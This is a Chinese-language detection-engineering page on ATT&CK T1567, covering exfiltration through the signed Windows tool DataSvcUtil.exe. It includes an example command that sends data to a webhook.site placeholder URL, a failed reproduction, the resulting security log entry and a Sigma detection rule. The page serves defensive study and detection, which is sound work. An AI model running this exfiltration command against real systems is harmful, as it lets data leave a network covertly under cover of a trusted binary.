跳转至

T1567-win-通过Web服务进行渗透-DataSvcUtil.exe(白名单)

来自ATT&CK的描述

攻击者可能使用现有的合法外部Web服务而不是他们的主要命令和控制通道来窃取数据。 由于网络中的主机可能在受到攻击之前已经与它们进行通信,因此流行Web服务可能充当渗漏机制的提供大量掩护。 防火墙规则也可能已经存在以允许这些服务的流量。

Web 服务提供商通常也使用 SSL/TLS 加密,为攻击者提供更高级别的保护。

测试案例

DataSvcUtil.exe是WCF数据服务提供的命令行工具,它使用开放数据协议(OData)源,并生成从.NET Framework客户端应用程序访问数据服务所需的客户端数据服务类。

路径:

- C:\Windows\Microsoft.NET\Framework64\v3.5\DataSvcUtil.exe

一般上传文件、凭据或数据泄露:

DataSvcUtil /out:C:\\Windows\\System32\\calc.exe /uri:https://webhook.site/xxxxxxxxx?encodedfile

用例:上传文件 所需权限:用户 操作系统:Windows 10

检测日志

windows安全日志

测试复现

C:\Windows\Microsoft.NET\Framework64\v3.5>DataSvcUtil /out:C:\\Windows\\System32\\calc.exe /uri:https://www.baidu.com/
Microsoft (R) DataSvcUtil 版本 3.5.0.0
版权所有 (C) 2008 Microsoft Corporation。保留所有权利。

正在写入对象层文件...
错误 7001: 远程服务器返回错误: (404) 未找到。

生成已完成 -- 1 个错误,0 个警告

日志留痕

已创建新进程。



创建者主题:

安全 ID: DESKTOP-PT656L6\liyang

帐户名: liyang

帐户域: DESKTOP-PT656L6

登录 ID: 0x47126



目标主题:

安全 ID: NULL SID

帐户名: -

帐户域: -

登录 ID: 0x0



进程信息:

新进程 ID: 0x2260

新进程名称: C:\Windows\Microsoft.NET\Framework64\v3.5\DataSvcUtil.exe

令牌提升类型: %%1938

强制性标签: Mandatory Label\Medium Mandatory Level

创建者进程 ID: 0x24b4

创建者进程名称: C:\Windows\System32\cmd.exe

进程命令行: DataSvcUtil  /out:C:\\Windows\\System32\\calc.exe /uri:https://www.baidu.com/

检测规则/思路

参考Sigma官方规则:

title: LOLBAS Data Exfiltration by DataSvcUtil.exe

id: e290b10b-1023-4452-a4a9-eb31a9013b3a

status: experimental

author: Ialle Teixeira @teixeira0xfffff, Austin Songer @austinsonger

date: 2021/09/30

description: Detects when a user performs data exfiltration by using DataSvcUtil.exe

references:

- https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6

- https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe

- https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services

- https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services

tags:

- attack.exfiltration

- attack.t1567

logsource:

category: process_creation

product: windows

detection:

selection:

CommandLine|contains|all:

- '/in:'

- '/out:'

Image|endswith:

- '\DataSvcUtil.exe'

condition: selection

fields:

- ComputerName

- User

- CommandLine

- ParentCommandLine

参考推荐

MITRE-ATT&CK-T1567

https://attack.mitre.org/techniques/T1567

DataSvcUtil.exe

https://lolbas-project.github.io/lolbas/Binaries/DataSvcUtil/